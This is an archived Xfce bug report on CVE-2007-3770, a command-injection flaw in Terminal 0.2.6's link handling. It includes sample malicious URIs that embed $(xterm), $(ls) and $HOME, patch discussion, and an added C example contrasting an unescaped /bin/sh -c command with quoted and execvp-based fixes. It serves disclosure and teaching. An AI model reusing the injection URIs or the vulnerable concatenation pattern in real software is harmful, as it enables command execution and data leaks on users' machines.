! Please note that this is a snapshot of our old Bugzilla server, which is read only since May 29, 2020. Please go to gitlab.xfce.org for our new server !
Terminal-0.2.6, URL handling allows remote shell command execution
Status:
CLOSED: FIXED
Product:
Xfce4-terminal
Component:
General

Comments

Description Samuli Suominen 2007-07-10 20:24:17 CEST
Reported security issue with Terminal-0.2.6.

<quote>

Clicking "Open Link" on a malicious link may leak information or allow remote
shell command execution because Xfce Terminal uses /bin/sh -c with
gdk_spawn_on_screen for running the browser, with no proper escaping in the
URI. A recommended fix would be to use the execvp(2) series functions with no
shell.

Example URIs:
http://foo.bar/$(xterm)/ - remote command execution
http://google.com/search?q=$(ls)&sourceid=b0rk - used for stealing information
http://google.com/search?q=$HOME - examine environment

The behavior of these may vary depending on the browser chosen. I can verify
the current results on two computers with the default setting "Mozilla Firefox"
chosen, using Terminal-0.2.6.

</quote>
Comment 1 Benedikt Meurer 2007-07-20 16:55:44 CEST
Fixed with revision 25929.

2007-07-20	Benedikt Meurer <benny@xfce.org>

	* helpers/, icons/, terminal/, Makefile.am, NEWS, Terminal.ui,
	  configure.in.in, doc/: Drop the preferred application handling
	  from Terminal and use the Xfce preferred application directly.
	  This fixes a security issue, where the URL handling allowed
	  for remote shell command execution, because the helper scripts
	  were run via the shell (Bug #3383).
Comment 2 Yves-Alexis Perez 2007-07-21 10:30:18 CEST
Will there be a patch fixing this bug against stable version 0.2.6?

Regards,

--
Yves-Alexis Perez
Comment 3 Benedikt Meurer 2007-07-21 19:09:30 CEST
Hm, that was quite a large change. It wouldn't make sense to backport it (you could use the current svn, which is not that different from 0.2.6).

If you don't want to use an svn version, you can try a quick fix: In terminal-helper.c, function terminal_helper_execute, g_shell_quote() the uri prior to inserting it into the command string. That should be enough to avoid the security issue.
Comment 4 Samuli Suominen 2007-07-21 20:10:44 CEST
We went with a snapshot of current svn, but a released tarball would be nice. 0.2.6.1, 0.2.7..
Comment 5 Darren Salt 2007-08-12 16:18:16 CEST
Created attachment 1309 
Fix for 0.2.6
Comment 6 Eren Türkay 2007-08-12 16:55:24 CEST
With this patch, command execution is fixed but ENV variables can still be reached via clicking a URL. Just write it in Terminal and click:

www.foobar.com/$HOME
Comment 7 Eren Türkay 2007-08-14 06:34:45 CEST
Created attachment 1311 
Full Patch for CVE-2007-3770

Here is a full patch; even ENV variables can't be reached.
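
Added example (editor's code, not Terminal's and not either attached patch) covering the fix discussed in comment 3 and the residual $HOME expansion reported in comment 6: the same URI handed to the browser three ways. First pasted into a string meant for "/bin/sh -c" (the vulnerable pattern from the report), then quoted the way g_shell_quote() quotes (reimplemented here as shell_quote() so the file needs no GLib), and finally as an argv vector for execvp(2) with no shell in the path. The browser name, the command template and the helper names are assumptions; the sample URIs are the ones from the report. main() runs the unquoted and quoted fragments through /bin/sh so the difference is visible.

```c
/* Added example, not code from Terminal or from either attached patch.
 * Browser name and command template are assumptions for illustration. */
#define _POSIX_C_SOURCE 200809L   /* popen(), strdup() */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Single-quote `s` so /bin/sh reads it back literally; each embedded '
 * becomes '\'' (close quote, escaped quote, reopen).  This is the same
 * strategy g_shell_quote() uses.  Caller frees the result. */
char *shell_quote(const char *s)
{
    size_t len = strlen(s), quotes = 0;
    for (const char *p = s; *p; p++)
        if (*p == '\'')
            quotes++;
    char *out = malloc(len + 2 + quotes * 3 + 1); /* 2 outer quotes, +3 per ', NUL */
    if (!out)
        return NULL;
    char *o = out;
    *o++ = '\'';
    for (const char *p = s; *p; p++) {
        if (*p == '\'') {
            memcpy(o, "'\\''", 4);
            o += 4;
        } else {
            *o++ = *p;
        }
    }
    *o++ = '\'';
    *o = '\0';
    return out;
}

/* Vulnerable pattern: the URI is concatenated into a string the caller
 * hands to "/bin/sh -c", so $(...), `...` and $VAR inside it are expanded. */
char *build_vulnerable_command(const char *browser, const char *uri)
{
    size_t n = strlen(browser) + 1 + strlen(uri) + 1;
    char *cmd = malloc(n);
    if (cmd)
        snprintf(cmd, n, "%s %s", browser, uri);
    return cmd;
}

/* Quick fix from comment 3: quote the URI before inserting it. */
char *build_quoted_command(const char *browser, const char *uri)
{
    char *q = shell_quote(uri);
    if (!q)
        return NULL;
    size_t n = strlen(browser) + 1 + strlen(q) + 1;
    char *cmd = malloc(n);
    if (cmd)
        snprintf(cmd, n, "%s %s", browser, q);
    free(q);
    return cmd;
}

/* Real fix: no shell.  The URI is a single argv element for execvp(2)
 * (or a spawn call that takes a vector), so nothing in it is interpreted. */
char **build_argv(const char *browser, const char *uri)
{
    char **argv = calloc(3, sizeof *argv);
    if (!argv)
        return NULL;
    argv[0] = strdup(browser);
    argv[1] = strdup(uri);
    argv[2] = NULL;   /* execvp() needs a NULL terminator */
    return argv;
}

/* Demo only: let /bin/sh expand `fragment` as it would inside the command
 * string and print what it saw.  Use harmless samples, not $(xterm). */
static void show_expansion(const char *label, const char *fragment)
{
    char cmd[512], line[256];
    snprintf(cmd, sizeof cmd, "printf '%%s\\n' %s", fragment);
    FILE *fp = popen(cmd, "r");
    if (!fp)
        return;
    if (fgets(line, sizeof line, fp))
        printf("%-9s sh sees: %s", label, line);
    pclose(fp);
}

int main(void)
{
    const char *uri = "http://google.com/search?q=$HOME"; /* from the report */
    char *vuln = build_vulnerable_command("firefox", uri);
    char *safe = build_quoted_command("firefox", uri);
    char *q = shell_quote(uri);
    printf("unquoted: %s\nquoted:   %s\n", vuln, safe);
    show_expansion("unquoted:", uri); /* $HOME is expanded: info leak   */
    show_expansion("quoted:", q);     /* literal "$HOME" reaches browser */
    free(vuln); free(safe); free(q);
    return 0;
}
```

Quoting fixes both the $(xterm) and the $HOME cases because single quotes suppress every expansion, which is why a patch that only neutralises command substitution still leaks the environment as comment 6 describes; the argv route removes the question entirely, since no shell ever parses the URI.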

Bug #3383

Reported by:
Samuli Suominen
Reported on: 2007-07-10
Last modified on: 2009-12-17

People

Assignee:
Benedikt Meurer
CC List:
3 users

Attachments

Fix for 0.2.6 (6.56 KB, patch)
2007-08-12 16:18 CEST , Darren Salt
no flags
Full Patch for CVE-2007-3770 (9.83 KB, patch)
2007-08-14 06:34 CEST , Eren Türkay
no flags